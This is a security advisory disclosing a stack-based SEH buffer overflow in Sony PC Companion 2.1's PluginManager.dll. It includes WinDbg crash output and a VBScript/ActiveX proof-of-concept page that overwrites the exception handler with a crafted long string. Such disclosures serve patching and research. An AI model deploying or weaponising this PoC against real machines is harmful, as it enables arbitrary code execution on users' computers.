Sony PC Companion 2.1 Admin_RemoveDirectory() Unicode Buffer Overflow

`  
Sony PC Companion 2.1 (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overload SEH  
  
  
Vendor: Sony Mobile Communications AB  
Product web page: http://www.sonymobile.com  
Affected version: 2.10.115 (Production 27.1, Build 830)  
2.10.108 (Production 26.1, Build 818)  
  
Summary: PC Companion is a computer application that acts as a portal  
to Sony Xperia and operator features and applications, such as phone  
software updates, management of contacts and calendar, media management  
with Media Go, and a backup and restore feature for your phone content.  
  
Desc: The vulnerability is caused due to a boundary error in PluginManager.dll  
when handling the value assigned to the 'Path' item in the Admin_RemoveDirectory  
function and can be exploited to cause a stack-based buffer overflow via an  
overly long string which may lead to execution of arbitrary code on the affected  
machine.  
  
  
------------------------------------------------------------------------------  
  
STATUS_STACK_BUFFER_OVERRUN encountered  
(1e5c.1b34): Break instruction exception - code 80000003 (first chance)  
eax=00000000 ebx=6348e958 ecx=75b1de28 edx=0013e505 esi=00000000 edi=0013ed88  
eip=75b1dca5 esp=0013e74c ebp=0013e7c8 iopl=0 nv up ei pl zr na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246  
KERNEL32!FormatMessageA+0x13c85:  
75b1dca5 cc int 3  
0:000> !exchain  
0013e7b8: KERNEL32!RegSaveKeyExA+3e9 (75b49b72)  
0013f114: 00430043  
Invalid exception stack at 00420042  
0:000> d 0013f114  
0013f114 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.  
0013f124 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0013f134 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0013f144 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0013f154 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0013f164 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0013f174 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0013f184 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0:000>  
  
------------------------------------------------------------------------------  
  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2012-5120  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5120.php  
  
http://cwe.mitre.org/data/definitions/121.html  
  
  
09.11.2012  
  
---  
  
  
<html>  
<body>  
<object classid='clsid:BBB7AA7C-DCE4-4F85-AED3-72FE3BCA4141' id='overrun' />  
<script language='vbscript'>  
targetFile = "C:\Program Files\Sony\Sony PC Companion\PluginManager.dll"  
prototype = "Function Admin_RemoveDirectory ( ByVal Path As String ) As tagRemoveDirectoryError"  
memberName = "Admin_RemoveDirectory"  
progid = "PluginManagerLib.ElevatedTasks"  
argCount = 1  
  
Path=String(760, "A") + "BB" + "CC" + String(1000, "D")  
  
' ^ ^ ^ ^  
' | | | |  
'------------ junk ---- nseh -- seh ------- junk --------  
  
overrun.Admin_RemoveDirectory Path  
  
</script>  
</body>  
</html>  
`